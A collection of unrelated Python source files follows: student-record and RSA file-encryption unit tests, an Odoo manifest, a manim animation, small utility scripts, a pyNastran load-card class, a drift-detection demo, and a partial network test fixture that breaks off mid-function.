courses_info = {'10103': [['CS 501', 'SSW 810'], {'SSW 555', 'SSW 540'}, None],
'10115': [['SSW 810'], {'SSW 555', 'SSW 540'}, {'CS 501', 'CS 546'}],
'10183': [['SSW 555', 'SSW 810'], {'SSW 540'}, {'CS 501', 'CS 546'}],
'10175': [['SSW 567', 'SSW 564', 'SSW 687'], ['SSW 540', 'SSW 555'], \
['CS 501', 'CS 513', 'CS 545']],
'11714': [['CS 546', 'CS 570', 'SSW 810'], None, None]}
courses_dic = dict()
for cwid, student in stevens.students.items():
courses_dic[cwid] = stevens.majors[student.major].update_courses(student.courses)
self.assertTrue(courses_dic, courses_info)
def test_db(self):
stevens = Repository('Test', False)
instructor_db_info = [(98762, 'Hawking, S', 'CS', 'CS 501', 1),
(98762, 'Hawking, S', 'CS', 'CS 546', 1), (98762, 'Hawking, S', 'CS', 'CS 570', 1),
(98763, 'Rowland, J', 'SFEN', 'SSW 555', 1), (98763, 'Rowland, J', 'SFEN', 'SSW 810', 4),
(98764, 'Cohen, R', 'SFEN', 'CS 546', 1)]
self.assertEqual(stevens.query_list, instructor_db_info)
if __name__ == '__main__':
unittest.main(exit=False, verbosity=2)
# To execute main function that prints the pretty table
print("\n===============================================================================")
main()
|
#!/usr/bin/env python
import common, unittest
import io, os, tempfile, sys
from cryptography.hazmat.primitives import serialization as crypto_serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.backends import default_backend as crypto_default_backend
mod = common.load('encrypt_file', common.TOOLS_DIR + '/scripts/files/encrypt_file.py')
class MockWrapper(mod.CommandWrapper):
def __init__(self):
super().__init__()
self.errors = []
self.notices = []
self.environ = {}
def log_error(self, msg):
self.errors.append(msg)
def log_notice(self, msg):
self.notices.append(msg)
class MockWrapperTests(common.TestCase):
def setUp(self):
self.wrapper = MockWrapper()
def test_log_error(self):
self.wrapper.log_error('abc')
self.assertEqual('abc', self.assertSingle(self.wrapper.errors))
def test_log_notice(self):
self.wrapper.log_notice('abc')
self.assertEqual('abc', self.assertSingle(self.wrapper.notices))
'''
Tests involving my RSA encryption wrapper
'''
class RSAWrapperTests(common.TestCase):
def setUp(self):
self.wrapper = MockWrapper()
def make_keypair(self, directory, label):
path_private_key = os.path.join(directory, '%s.rsa.private' % label)
path_public_key = os.path.join(directory, '%s.rsa.public' % label)
key = rsa.generate_private_key(
backend=crypto_default_backend(),
public_exponent=65537,
key_size=2048
)
private_key = key.private_bytes(
crypto_serialization.Encoding.PEM,
crypto_serialization.PrivateFormat.PKCS8,
crypto_serialization.NoEncryption()
)
with open(path_private_key, 'wb') as f:
f.write(private_key)
public_key = key.public_key().public_bytes(
crypto_serialization.Encoding.PEM,
crypto_serialization.PublicFormat.PKCS1
)
with open(path_public_key, 'wb') as f:
f.write(public_key)
return path_public_key, path_private_key
def assertFail(self, **kwargs):
self.assertEqual(1, self.wrapper.run(**kwargs))
def assertSuccess(self, **kwargs):
self.assertEqual(0, self.wrapper.run(**kwargs))
self.assertEmpty(self.wrapper.errors)
def test_check_required_file_fail_no_exist(self):
label = 'MY LABEL'
with tempfile.TemporaryDirectory() as td:
path = os.path.join(td, 'nope')
self.assertFalse(self.wrapper.check_required_file(label, path))
error = self.assertSingle(self.wrapper.errors)
self.assertStartsWith('%s ' % label, error)
self.assertContains('does not exist', error)
self.assertEndsWith(path, error)
def test_check_required_file_fail_not_provided(self):
label = 'MY LABEL'
self.assertFalse(self.wrapper.check_required_file(label, ''))
error = self.assertSingle(self.wrapper.errors)
self.assertEqual('%s not provided.' % label, error)
def test_check_required_file_pass_dash(self):
self.assertTrue(self.wrapper.check_required_file('moot', '-'))
self.assertEmpty(self.wrapper.errors)
def test_error_ambiguous(self):
run_kwargs = {
'args': ['-d', '-e']
}
self.assertFail(**run_kwargs)
self.assertContains('Ambiguous arguments, unsure whether we want to encrypt or decrypt.', self.wrapper.errors)
def test_load_keyfile_private_error(self):
label = 'mylabel'
with tempfile.TemporaryDirectory() as td:
path = os.path.join(td, 'nope')
self.assertFalse(self.wrapper.load_keyfile_private(label, path, None))
error = self.assertSingle(self.wrapper.errors)
self.assertContains('does not exist', error)
self.assertEndsWith(path, error)
def test_load_keyfile_private_error_env(self):
label = 'mylabel'
with tempfile.TemporaryDirectory() as td:
path = os.path.join(td, 'nope')
self.wrapper.environ['PRIVATE'] = path
self.assertFalse(self.wrapper.load_keyfile_private(label, path, 'PRIVATE'))
error = self.assertSingle(self.wrapper.errors)
self.assertContains('does not exist', error)
self.assertContains('environment variable', error)
self.assertEndsWith(path, error)
def test_load_keyfile_public_error(self):
label = 'mylabel'
with tempfile.TemporaryDirectory() as td:
path = os.path.join(td, 'nope')
self.assertFalse(self.wrapper.load_keyfile_public(label, path, None))
error = self.assertSingle(self.wrapper.errors)
self.assertContains('does not exist', error)
self.assertEndsWith(path, error)
def test_load_keyfile_public_error_env(self):
label = 'mylabel'
with tempfile.TemporaryDirectory() as td:
path = os.path.join(td, 'nope')
self.wrapper.environ['PUBLIC'] = path
self.assertFalse(self.wrapper.load_keyfile_public(label, path, 'PUBLIC'))
error = self.assertSingle(self.wrapper.errors)
self.assertContains('does not exist', error)
self.assertContains('environment variable', error)
self.assertEndsWith(path, error)
'''
Confirm that we can encrypt and decrypt a file using paths using the outermost main() function
'''
def test_main_encrypt_and_decrypt(self):
contents = b"THIS IS MY FILE CONTENT"
with tempfile.TemporaryDirectory() as td:
path_raw = os.path.join(td, 'raw')
path_enc = os.path.join(td, 'enc')
path_out = os.path.join(td, 'out')
with open(path_raw, 'wb') as f:
f.write(contents)
public, private = self.make_keypair(td, 'test')
enc_args = ['--public', public, '-i', path_raw, '-o', path_enc]
self.assertEqual(0, mod.main(enc_args, {}, MockWrapper))
self.assertEmpty(self.wrapper.errors)
self.assertEmpty(self.wrapper.notices)
self.assertTrue(os.path.isfile(path_enc))
with open(path_enc, 'rb') as stream_enc:
enc = stream_enc.read()
self.assertDoesNotContain(contents, enc)
dec_args = ['--private', private, '-i', path_enc, '-o', path_out]
self.assertEqual(0, mod.main(dec_args, {}, MockWrapper))
self.assertEmpty(self.wrapper.errors)
self.assertEmpty(self.wrapper.notices)
with open(path_out, 'rb') as stream_out:
out = stream_out.read()
self.assertEqual(contents, out)
def test_main_keyboard_interrupt(self):
class KeyboardInterruptMockWrapper(MockWrapper):
def run(self, **kwargs):
raise KeyboardInterrupt()
wrapper = KeyboardInterruptMockWrapper()
self.assertEqual(130, mod.main([], {}, KeyboardInterruptMockWrapper))
def test_make_keypair(self):
with tempfile.TemporaryDirectory() as td:
public, private = self.make_keypair(td, 'test')
with open(private, 'r') as f:
contents = f.read()
self.assertContains('-BEGIN PRIVATE KEY-', contents)
with open(public, 'r') as f:
contents = f.read()
self.assertContains('-BEGIN RSA PUBLIC KEY-', contents)
def test_run_encrypt_single(self):
contents = b"THIS IS MY FILE CONTENT"
with tempfile.TemporaryDirectory() as td:
path_raw = os.path.join(td, 'raw')
path_enc = os.path.join(td, 'enc')
with open(path_raw, 'w') as f:
f.write(path_raw)
public, private = self.make_keypair(td, 'test')
wrapper_kwargs = {
'args': ['--public', public, '-i', path_raw, '-o', path_enc]
}
self.assertSuccess(**wrapper_kwargs)
self.assertEmpty(self.wrapper.notices)
self.assertTrue(os.path.isfile(path_enc))
with open(path_enc, 'rb') as enc_stream:
enc = enc_stream.read()
self.assertDoesNotContain(contents, enc)
def test_run_encrypt_single_dash(self):
contents = b"THIS IS MY FILE CONTENT"
self.wrapper.get_stream_length = lambda stream: stream.getbuffer().nbytes
with tempfile.TemporaryDirectory() as td:
with io.BytesIO() as stream_raw:
with io.BytesIO() as stream_enc:
stream_raw.write(contents)
stream_raw.seek(0, 0)
public, private = self.make_keypair(td, 'test')
wrapper_kwargs = {
'args': ['--public', public, '-i', '-', '-o', '-'],
'dashstream_in': stream_raw,
'dashstream_out': stream_enc
}
self.assertSuccess(**wrapper_kwargs)
self.assertEmpty(self.wrapper.notices)
stream_enc.seek(0, 0)
enc = stream_enc.read()
self.assertDoesNotContain(contents, enc)
'''
Confirm that we can encrypt and decrypt a file using paths.
'''
def test_run_encrypt_and_decrypt(self):
contents = b"THIS IS MY FILE CONTENT"
with tempfile.TemporaryDirectory() as td:
path_raw = os.path.join(td, 'raw')
path_enc = os.path.join(td, 'enc')
path_out = os.path.join(td, 'out')
with open(path_raw, 'wb') as f:
f.write(contents)
public, private = self.make_keypair(td, 'test')
enc_kwargs = {
'args': ['--public', public, '-i', path_raw, '-o', path_enc]
}
self.assertSuccess(**enc_kwargs)
self.assertEmpty(self.wrapper.notices)
self.assertTrue(os.path.isfile(path_enc))
with open(path_enc, 'rb') as stream_enc:
enc = stream_enc.read()
self.assertDoesNotContain(contents, enc)
dec_kwargs = {
'args': ['--private', private, '-i', path_enc, '-o', path_out]
}
self.assertSuccess(**dec_kwargs)
self.assertEmpty(self.wrapper.notices)
with open(path_out, 'rb') as stream_out:
out = stream_out.read()
self.assertEqual(contents, out)
'''
Confirm that we can encrypt and decrypt a file using streams.
'''
def test_run_encrypt_and_decrypt_dash(self):
contents = b"THIS IS MY FILE CONTENT"
self.wrapper.get_stream_length = lambda stream: stream.getbuffer().nbytes
with tempfile.TemporaryDirectory() as td:
with io.BytesIO() as stream_raw:
with io.BytesIO() as stream_enc:
with io.BytesIO() as stream_out:
stream_raw.write(contents)
stream_raw.seek(0, 0)
public, private = self.make_keypair(td, 'test')
wrapper_kwargs = {
'args': ['--public', public, '-i', '-', '-o', '-'],
'dashstream_in': stream_raw,
'dashstream_out': stream_enc
}
self.assertSuccess(**wrapper_kwargs)
self.assertEmpty(self.wrapper.notices)
stream_enc.seek(0, 0)
enc = stream_enc.read()
stream_enc.seek(0, 0)
self.assertDoesNotContain(contents, enc)
dec_kwargs = {
'args': ['--private', private, '-i', '-', '-o', '-'],
'dashstream_in': stream_enc,
'dashstream_out': stream_out
}
self.assertSuccess(**dec_kwargs)
self.assertEmpty(self.wrapper.notices)
stream_out.seek(0, 0)
out = stream_out.read()
self.assertEqual(contents, out)
'''
Confirm that we can encrypt and decrypt a file using streams and compression options.
'''
def test_run_encrypt_and_decrypt_dash_compression(self):
contents = b"THIS IS MY FILE CONTENT THAT WILL BE COMPRESSED"
self.wrapper.get_stream_length = lambda stream: stream.getbuffer().nbytes
for compression in ['--gzip', '--bz2', '--lzma']:
with tempfile.TemporaryDirectory() as td:
with io.BytesIO() as stream_raw:
with io.BytesIO() as stream_enc:
with io.BytesIO() as stream_out:
stream_raw.write(contents)
stream_raw.seek(0, 0)
public, private = self.make_keypair(td, 'test')
enc_kwargs = {
'args': ['--public', public, '-i', '-', '-o', '-', compression],
'dashstream_in': stream_raw,
'dashstream_out': stream_enc
}
self.assertSuccess(**enc_kwargs)
self.assertEmpty(self.wrapper.notices)
stream_enc.seek(0, 0)
enc = stream_enc.read()
stream_enc.seek(0, 0)
self.assertDoesNotContain(contents, enc)
dec_kwargs = {
'args': ['--private', private, '-i', '-', '-o', '-'],
'dashstream_in': stream_enc,
'dashstream_out': stream_out
}
self.assertSuccess(**dec_kwargs)
self.assertEmpty(self.wrapper.notices)
stream_out.seek(0, 0)
out = stream_out.read()
self.assertEqual(contents, out)
'''
Confirm that we can encrypt and decrypt a file with public/private key paths set as environment variables.
'''
def test_run_encrypt_and_decrypt_dash_environment_keys(self):
contents = b"THIS IS MY FILE CONTENT"
self.wrapper.get_stream_length = lambda stream: stream.getbuffer().nbytes
with tempfile.TemporaryDirectory() as td:
with io.BytesIO() as stream_raw:
with io.BytesIO() as stream_enc:
with io.BytesIO() as stream_out:
stream_raw.write(contents)
stream_raw.seek(0, 0)
public, private = self.make_keypair(td, 'test')
environ = {
'RSA_PUBLIC_KEY': public,
'RSA_PRIVATE_KEY': private
}
wrapper_kwargs = {
'args': ['-e', '-i', '-', '-o', '-'],
'dashstream_in': stream_raw,
'dashstream_out': stream_enc,
'environ': environ
}
self.assertSuccess(**wrapper_kwargs)
self.assertEmpty(self.wrapper.notices)
stream_enc.seek(0, 0)
enc = stream_enc.read()
stream_enc.seek(0, 0)
self.assertDoesNotContain(contents, enc)
dec_kwargs = {
'args': ['-d', '-i', '-', '-o', '-'],
'dashstream_in': stream_enc,
'dashstream_out': stream_out,
'environ': environ
}
self.assertSuccess(**dec_kwargs)
self.assertEmpty(self.wrapper.notices)
stream_out.seek(0, 0)
out = stream_out.read()
self.assertEqual(contents, out)
'''
Confirm that we can encrypt and decrypt a larger file stream.
This larger file is greater than the size of a single cipherblock.
'''
def test_run_encrypt_and_decrypt_dash_large(self):
contents = b"\nTHIS IS MY FILE CONTENT"
i = 0
while i < 10:
contents += contents
i += 1
self.assertTrue(len(contents) > 5000)
self.wrapper.get_stream_length = lambda stream: stream.getbuffer().nbytes
with tempfile.TemporaryDirectory() as td:
with io.BytesIO() as stream_raw:
with io.BytesIO() as stream_enc:
with io.BytesIO() as stream_out:
stream_raw.write(contents)
stream_raw.seek(0, 0)
public, private = self.make_keypair(td, 'test')
wrapper_kwargs = {
'args': ['--public', public, '-i', '-', '-o', '-'],
'dashstream_in': stream_raw,
'dashstream_out': stream_enc
}
self.assertSuccess(**wrapper_kwargs)
self.assertEmpty(self.wrapper.notices)
stream_enc.seek(0, 0)
enc = stream_enc.read()
stream_enc.seek(0, 0)
self.assertDoesNotContain(contents, enc)
dec_kwargs = {
'args': ['--private', private, '-i', '-', '-o', '-'],
'dashstream_in': stream_enc,
'dashstream_out': stream_out
}
self.assertSuccess(**dec_kwargs)
self.assertEmpty(self.wrapper.notices)
stream_out.seek(0, 0)
out = stream_out.read()
self.assertEqual(contents, out)
'''
Test that we can convert a condensed hash to a more human readable form
'''
def test_translate_digest(self):
# MD5 Checksum of 'hello-world'
condensed = b' \x951!\x89u=\xe6\xadG\xdf\xe2\x0c\xbe\x97\xec'
expected = '2095312189753de6ad47dfe20cbe97ec'
# If you want to generate something new, do the following:
# from hashlib import md5
# m = md5()
# m.update(b'hello-world')
# print(m.digest(), m.hexdigest())
self.assertEqual(expected, mod._translate_digest(condensed))
|
# Copyright 2014 Daniel Reis
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
{
"name": "Add State field to Project Stages",
"version": "14.0.1.1.0",
"category": "Project Management",
"summary": "Restore State attribute removed from Project Stages in 8.0",
"author": "Daniel Reis, Odoo Community Association (OCA)",
"website": "https://github.com/OCA/project",
"license": "AGPL-3",
"installable": True,
"depends": ["project"],
"data": ["security/ir.model.access.csv", "views/project_view.xml"],
}
|
import numpy
from manim import *
from ep2.scenes.description import Coin
from ep2.scenes.utils import CyrTex
groups = [
[1, 1, 10, 10, 10, 10, 50, 50],
[1, 1, 10, 10, 20, 50, 50],
[1, 1, 20, 20, 50, 50],
[1, 1, 5, 5, 10, 5 + 5, 10, 50, 50],
[1, 1, 5, 5, 10, 20, 50, 50],
[1, 1, 5, 5, 5, 5, 20, 50, 50],
[1, 2, 2, 2, 5, 10, 10, 10, 50, 50],
[2, 10, 10, 10, 10, 50, 50],
[2, 10, 10, 20, 50, 50],
[2, 20, 20, 50, 50],
[2, 5, 5, 10, 10, 10, 50, 50],
[2, 5, 5, 10, 20, 50, 50],
[2, 5, 5, 5, 5, 10, 10, 50, 50],
[2, 5, 5, 5, 5, 20, 50, 50],
]
class BruteForce(Scene):
def construct(self):
amount_cents_small = CyrTex(r'\foreignlanguage{bulgarian}{142 ¢} $=$').scale(2)
amount_cents_small.shift(amount_cents_small.get_width() * LEFT + UP * 0.5)
self.add(amount_cents_small)
mo_group = Group()
for loop in range(1):
for group in groups:
self.remove(mo_group)
# self.play(FadeOut(mo_group, run_time=0.05))
mo_group = Group()
uniq, counts = numpy.unique(group, return_counts=True)
print(uniq)
first = None
for coin, count in zip(uniq, counts):
print(f"{count} x {coin}")
mo_coins = [Coin(coin) for _ in range(count)]
mo_group.add(*mo_coins)
if first:
mo_coins[0].next_to(first, DOWN)
first = mo_coins[0]
for prev, cur in zip(mo_coins, mo_coins[1:]):
cur.next_to(prev, RIGHT)
brace = Brace(mo_group, direction=LEFT)
brace2 = BraceLabel(mo_group, r'\foreignlanguage{english}{$' + str(len(group)) + "$ coins}", label_constructor=CyrTex)
mo_group.add(brace, brace2)
mo_group.shift(amount_cents_small.get_critical_point(RIGHT) - brace.get_tip() + X_AXIS * DEFAULT_MOBJECT_TO_MOBJECT_BUFFER)
self.add(mo_group)
# self.play(FadeIn(mo_group, run_time=0.05))
self.wait(0.2)
self.wait()
self.play(FadeOut(amount_cents_small), FadeOut(mo_group))
self.wait(10)
|
"""
program to calculate the harmonic sum of n-1.
The harmonic sum is the sum of reciprocals of the positive integers.
"""
def harmonic_sum(n):
if n < 2:
return 1
else:
return 1 / n + (harmonic_sum(n - 1))
print(harmonic_sum(7))
print(harmonic_sum(4))
|
class InputValidator:
"""
Input validation class. Available methods:
* validate_keys - validates a correct structure of input
* validate_input - validates data types, empty strings and other errors
"""
def __init__(self, input_data):
self.__input_data = input_data
@property
def validate_keys(self) -> dict:
"""
Validates input keys to ensure the correct structure of the input.
:return: json response ok if keys match, errors if input is incorrect.
"""
valid_keys = ("artist", "title", "release_format", "number_of_tracks", "release_year", "rating",
"votes", "have", "want", "limited_edition", "media_condition", "sleeve_condition")
if not all(name in self.__input_data for name in valid_keys):
return {
"response": "error",
"validation_errors": "missing keys, please refer to documentation"
}
return {"response": "ok"}
@property
def validate_input(self) -> [list, bool]:
"""
Validates input values and builds an error response if any errors are present.
:return: json response ok if no errors, otherwise errors
"""
validation_errors = []
if self.validate_artist_not_str:
validation_errors.append(self.validate_artist_not_str)
if self.validate_title_not_str:
validation_errors.append(self.validate_title_not_str)
if self.validate_release_format_not_str:
validation_errors.append(self.validate_release_format_not_str)
if self.validate_artist_name_empty:
validation_errors.append(self.validate_artist_name_empty)
if self.validate_title_empty:
validation_errors.append(self.validate_title_empty)
if self.validate_release_format_empty:
validation_errors.append(self.validate_release_format_empty)
if self.validate_release_format_categories:
validation_errors.append(self.validate_release_format_categories)
if self.validate_limited_edition:
validation_errors.append(self.validate_limited_edition)
if self.validate_numerical_variables:
validation_errors.append(self.validate_numerical_variables[0])
if validation_errors:
return {
"response": "error",
"validation_errors": validation_errors
}
return {"response": "ok"}
@property
def validate_artist_not_str(self) -> [str, None]:
if not isinstance(self.__input_data["artist"], str):
return "Invalid data type for artist supplied. Artist name must be a string."
return
@property
def validate_title_not_str(self) -> [str, None]:
if not isinstance(self.__input_data["title"], str):
return "Invalid data type for title supplied. Title must be a string."
@property
def validate_release_format_not_str(self) -> [str, None]:
if not isinstance(self.__input_data["release_format"], str):
return "Invalid data type for release format. Release format must be a string."
@property
def validate_artist_name_empty(self) -> [str, None]:
if not self.__input_data["artist"]:
return "Artist name cannot be empty."
@property
def validate_title_empty(self) -> [str, None]:
if not self.__input_data["title"]:
return "Title cannot be empty."
@property
def validate_release_format_empty(self) -> [str, None]:
if not self.__input_data["release_format"]:
return "Release format cannot be empty."
@property
def validate_release_format_categories(self) -> [str, None]:
available_categories = ['12"', '10"', '7"', 'LP', 'EP']
if self.__input_data["release_format"] not in available_categories:
return f"Unknown release format category. Available categories: {available_categories}"
@property
def validate_limited_edition(self) -> [str, None]:
if not isinstance(self.__input_data["limited_edition"], bool):
return "Invalid data type for limited edition. Limited edition must be a boolean (true/false)."
@property
def validate_numerical_variables(self) -> list:
numerical_variables = [
self.__input_data["number_of_tracks"],
self.__input_data["release_year"],
self.__input_data["rating"],
self.__input_data["votes"],
self.__input_data["have"],
self.__input_data["want"],
self.__input_data["media_condition"],
self.__input_data["sleeve_condition"]
]
errors = []
for val in numerical_variables:
if not isinstance(val, (int, float)):
errors.append(f"Invalid data type {val}. Please provide a numeric value.")
return errors
|
from decimal import Decimal, ROUND_HALF_UP
def get_dir(deg: int) -> str: # pragma: no cover
if deg <= 0:
return 'C'
if deg < 11.25:
return 'N'
if deg < 33.75:
return 'NNE'
if deg < 56.25:
return 'NE'
if deg < 78.75:
return 'ENE'
if deg < 101.25:
return 'E'
if deg < 123.75:
return 'ESE'
if deg < 146.25:
return 'SE'
if deg < 168.75:
return 'SSE'
if deg < 191.25:
return 'S'
if deg < 213.75:
return 'SSW'
if deg < 236.25:
return 'SW'
if deg < 258.75:
return 'WSW'
if deg < 281.25:
return 'W'
if deg < 303.75:
return 'WNW'
if deg < 326.25:
return 'NW'
if deg < 326.25:
return 'NW'
if deg < 348.75:
return 'NNW'
return 'N'
def get_wind(w: float) -> int: # pragma: no cover
if w <= 0.2:
return 0
if w <= 1.5:
return 1
if w <= 3.3:
return 2
if w <= 5.4:
return 3
if w <= 7.9:
return 4
if w <= 10.7:
return 5
if w <= 13.8:
return 6
if w <= 17.1:
return 7
if w <= 20.7:
return 8
if w <= 24.4:
return 9
if w <= 28.4:
return 10
if w <= 32.6:
return 11
return 12
def resolve():
deg, dis = map(int, input().split())
dir = get_dir(deg / 10)
wind = Decimal(str(dis / 60)).quantize(Decimal('0.1'), rounding=ROUND_HALF_UP)
w = get_wind(float(wind))
if w == 0:
dir = 'C'
print("{} {}".format(dir, w))
|
from numpy import zeros, unique
from pyNastran.bdf.field_writer_8 import set_blank_if_default
from pyNastran.bdf.field_writer_8 import print_card_8
from pyNastran.bdf.field_writer_16 import print_card_16
from pyNastran.bdf.bdf_interface.assign_type import (integer, integer_or_blank,
double_or_blank)
class RFORCE:
type = 'RFORCE'
def __init__(self, model):
"""
Defines the RFORCE object.
Parameters
----------
model : BDF
the BDF object
.. todo:: collapse loads
"""
self.model = model
self.n = 0
self._cards = []
self._comments = []
def __getitem__(self, i):
unique_lid = unique(self.load_id)
if len(i):
f = RFORCE(self.model)
f.load_id = self.load_id[i]
f.node_id = self.node_id[i]
f.coord_id = self.coord_id[i]
f.scale_vel = self.scale_vel[i]
f.r = self.r[i]
f.method = self.method[i]
f.scale_acc = self.scale_acc[i]
f.mb = self.mb[i]
f.idrf = self.idrf[i]
f.n = len(i)
return f
raise RuntimeError('len(i) = 0')
def __mul__(self, value):
f = RFORCE(self.model)
f.load_id = self.load_id
f.node_id = self.node_id
f.coord_id = self.coord_id
f.scale_vel = self.scale_vel * value
f.r = self.r
f.method = self.method
f.scale_acc = self.scale_acc * value
f.mb = self.mb
f.idrf = self.idrf
f.n = self.n
return f
def __rmul__(self, value):
return self.__mul__(value)
def allocate(self, ncards):
float_fmt = self.model.float_fmt
self.load_id = zeros(ncards, 'int32')
self.node_id = zeros(ncards, 'int32')
self.coord_id = zeros(ncards, 'int32')
self.r = zeros((ncards, 3), float_fmt)
self.scale_vel = zeros(ncards, float_fmt)
self.method = zeros(ncards, 'int32')
self.scale_acc = zeros(ncards, float_fmt)
self.mb = zeros(ncards, 'int32')
self.idrf = zeros(ncards, 'int32')
def add_card(self, card, comment=''):
self._cards.append(card)
self._comments.append(comment)
def build(self):
"""
:param cards: the list of RFORCE cards
"""
cards = self._cards
ncards = len(cards)
self.n = ncards
if ncards:
float_fmt = self.model.float_fmt
#: Property ID
self.load_id = zeros(ncards, 'int32')
self.node_id = zeros(ncards, 'int32')
self.coord_id = zeros(ncards, 'int32')
self.r = zeros((ncards, 3), float_fmt)
self.scale_vel = zeros(ncards, float_fmt)
self.method = zeros(ncards, 'int32')
self.scale_acc = zeros(ncards, float_fmt)
self.mb = zeros(ncards, 'int32')
self.idrf = zeros(ncards, 'int32')
for i, card in enumerate(cards):
self.load_id[i] = integer(card, 1, 'load_id')
self.node_id[i] = integer(card, 2, 'node_id')
self.coord_id[i] = integer_or_blank(card, 3, 'coord_id', 0)
self.scale_vel[i] = double_or_blank(card, 4, 'scale', 1.)
self.r[i] = [double_or_blank(card, 5, 'R1', 0.),
double_or_blank(card, 6, 'R2', 0.),
double_or_blank(card, 7, 'R3', 0.)]
self.method[i] = integer_or_blank(card, 8, 'method', 1)
self.scale_acc[i] = double_or_blank(card, 9, 'racc', 0.)
self.mb[i] = integer_or_blank(card, 10, 'mb', 0)
self.idrf[i] = integer_or_blank(card, 11, 'idrf', 0)
assert len(card) <= 12, 'len(RFORCE card) = %i\ncard=%s' % (len(card), card)
i = self.load_id.argsort()
self.load_id = self.load_id[i]
self.node_id = self.node_id[i]
self.coord_id = self.coord_id[i]
self.scale_vel = self.scale_vel[i]
self.r = self.r[i]
self.method = self.method[i]
self.scale_acc = self.scale_acc[i]
self.mb = self.mb[i]
self.idrf = self.idrf[i]
self._cards = []
self._comments = []
def get_stats(self):
msg = []
if self.n:
msg.append(' %-8s: %i' % ('RFORCE', self.n))
return msg
def write_card(self, bdf_file, size=8, lids=None):
if self.n:
for (lid, nid, cid, scale_vel, r, method, scale_acc, mb, idrf) in zip(
self.load_id, self.node_id, self.coord_id, self.scale_vel,
self.r, self.scale_acc, self.mb, self.idrf):
#method = set_blank_if_default(method, 1)
scale_acc = set_blank_if_default(scale_acc, 0.)
mb = set_blank_if_default(mb, 0)
idrf = set_blank_if_default(idrf, 0)
card = ['RFORCE', lid, nid, cid, scale_vel,
r[0], r[1], r[2], method, scale_acc, mb, idrf]
if size == 8:
bdf_file.write(print_card_8(card))
else:
bdf_file.write(print_card_16(card))
|
#!/usr/bin/env python
# Python 2/3 compatability
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
import collections
import csv
import sys
Item = collections.namedtuple('Item', ['name', 'value', 'url'])
def _YieldItems(csvfile):
csvreader = csv.reader(csvfile)
for row in csvreader:
yield Item(*row)
def _WriteTable(items, out):
out.write('<table>\n')
out.write('<tr>\n')
for name, _, _ in items:
out.write('<th>%s</th>\n' % name)
out.write('</tr>\n')
out.write('<tr>')
for _, val, url in items:
out.write('<td>\n')
out.write('<a href="%s">%s</a>\n' % (url, val))
out.write('</td>\n')
out.write('</tr>\n')
out.write('</table>')
def main():
out = sys.stdout
spur_items = list(_YieldItems(open('spur.csv')))
out.write('<!doctype html>\n')
out.write('<html>\n')
out.write('<body>\n')
out.write('<h1>SPUR</h1>')
_WriteTable(spur_items, out)
out.write('</body>\n')
out.write('</html>\n')
if __name__ == '__main__':
main()
|
import numpy as np
import matplotlib.pyplot as plt
from hddm_a import HDDM_A
def showPlot(data, data2):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(range(len(data)), data)
ax.plot(range(len(data2)), data2)
plt.legend(['acc','bound'])
plt.show()
def tst():
hddm = HDDM_A()
data_stream = np.random.randint(2, size=2000)
average_prediciton = []
average_prediction_bound = []
for i in range(1000, 1200):
data_stream[i] = 1
for i in range(1500, 1700):
data_stream[i] = 1
for i in range(2000):
hddm.add_element(data_stream[i])
if hddm.detected_warning_zone():
print('Warning zone has been detected in data: ' + str(data_stream[i]) + ' - of index: ' + str(i))
if hddm.detected_change():
print('Change has been detected in data: ' + str(data_stream[i]) + ' - of index: ' + str(i))
average_prediciton.append(hddm.Z_)
average_prediction_bound.append(hddm.Z_epsilon)
# print('X', hddm.X_, ' ', 'Z', hddm.Z_)
# print('X_e', hddm.X_epsilon, ' ', 'Z', hddm.Z_epsilon)
showPlot(average_prediciton, average_prediction_bound)
def tst2():
hddm = HDDM_A()
data_stream = np.random.binomial(1, 0.5, 2000)
change_data_stream = np.random.binomial(1, 0.8, 500)
average_prediciton = []
average_prediction_bound = []
for i in range(1000, 1200):
data_stream[i] = change_data_stream[i-1000]
for i in range(1500, 1700):
data_stream[i] = change_data_stream[i+200-1500]
for i in range(2000):
hddm.add_element(data_stream[i])
if hddm.detected_warning_zone():
print('Warning zone has been detected in data: ' + str(data_stream[i]) + ' - of index: ' + str(i))
if hddm.detected_change():
print('Change has been detected in data: ' + str(data_stream[i]) + ' - of index: ' + str(i))
average_prediciton.append(hddm.Z_)
average_prediction_bound.append(hddm.Z_epsilon)
# print('X', hddm.X_, ' ', 'Z', hddm.Z_)
# print('X_e', hddm.X_epsilon, ' ', 'Z', hddm.Z_epsilon)
showPlot(average_prediciton, average_prediction_bound)
if __name__ == '__main__':
tst2()
|
import fixtures
from vnc_api.vnc_api import *
from util import retry
from time import sleep
from tcutils.services import get_status
from webui_test import *
class SvcInstanceFixture(fixtures.Fixture):
def __init__(self, connections, inputs, domain_name, project_name, si_name,
svc_template, if_list, left_vn_name=None, right_vn_name=None, do_verify=True, max_inst=1, static_route=['None', 'None', 'None']):
self.vnc_lib = connections.vnc_lib
self.api_s_inspect = connections.api_server_inspect
self.nova_fixture = connections.nova_fixture
self.inputs = connections.inputs
self.domain_name = domain_name
self.project_name = project_name
self.si_name = si_name
self.svc_template = svc_template
self.st_name = svc_template.name
self.si_obj = None
self.domain_fq_name = [self.domain_name]
self.project_fq_name = [self.domain_name, self.project_name]
self.si_fq_name = [self.domain_name, self.project_name, self.si_name]
self.logger = inputs.logger
self.left_vn_name = left_vn_name
self.right_vn_name = right_vn_name
self.do_verify = do_verify
self.if_list = if_list
self.max_inst = max_inst
self.static_route = static_route
self.si = None
self.svm_ids = []
self.cs_svc_vns = []
self.cs_svc_ris = []
self.svn_list = ['svc-vn-mgmt', 'svc-vn-left', 'svc-vn-right']
if self.inputs.webui_verification_flag:
self.browser = connections.browser
self.browser_openstack = connections.browser_openstack
self.webui = WebuiTest(connections, inputs)
# end __init__
def setUp(self):
super(SvcInstanceFixture, self).setUp()
self.si_obj = self._create_si()
# end setUp
def cleanUp(self):
super(SvcInstanceFixture, self).cleanUp()
self._delete_si()
assert self.verify_on_cleanup()
# end cleanUp
def _create_si(self):
self.logger.debug("Creating service instance: %s", self.si_fq_name)
try:
svc_instance = self.vnc_lib.service_instance_read(
fq_name=self.si_fq_name)
self.logger.debug(
"Service instance: %s already exists", self.si_fq_name)
except NoIdError:
project = self.vnc_lib.project_read(fq_name=self.project_fq_name)
svc_instance = ServiceInstance(self.si_name, parent_obj=project)
if self.left_vn_name and self.right_vn_name:
si_prop = ServiceInstanceType(
